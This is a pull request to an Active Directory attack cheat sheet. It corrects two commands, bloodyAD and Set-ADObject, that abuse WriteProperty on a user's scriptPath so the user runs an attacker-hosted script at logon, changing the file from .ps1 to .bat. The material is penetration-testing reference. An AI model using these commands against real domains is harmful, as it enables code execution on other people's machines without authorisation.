### PR TITLE
Update ad-adds-acl-ace.md

### DIFF
--- a/docs/active-directory/ad-adds-acl-ace.md
+++ b/docs/active-directory/ad-adds-acl-ace.md
@@ -105,11 +105,11 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr
 * WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : 
 	* Windows/Linux:
 		```ps1
-		bloodyAD --host 10.0.0.5 -d example.lab -u attacker -p 'Password123*' set object delegate scriptpath -v '\\10.0.0.5\totallyLegitScript.ps1'
+		bloodyAD --host 10.0.0.5 -d example.lab -u attacker -p 'Password123*' set object delegate scriptpath -v '\\10.0.0.5\totallyLegitScript.bat'
 		```
 	* Windows only:
 		```ps1
-		Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1"
+		Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.bat"
 		```
 
 ### Group


### PR DESCRIPTION
ScriptPath ([scriptPath](https://learn.microsoft.com/en-us/windows/win32/adschema/a-scriptpath)/[msTSInitialProgram](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-ada2/7f65d267-8a3f-4070-b94a-111e793d4821)) does NOT support `PowerShell` files, see the below links for more on what extensions can it run:
- https://redmondmag.com/articles/2016/02/09/logon-scripts-for-active-directory.aspx
- https://www.rlmueller.net/LogonScriptFAQ.htm#What%20languages%20can%20I%20use%20for%20logon%20scripts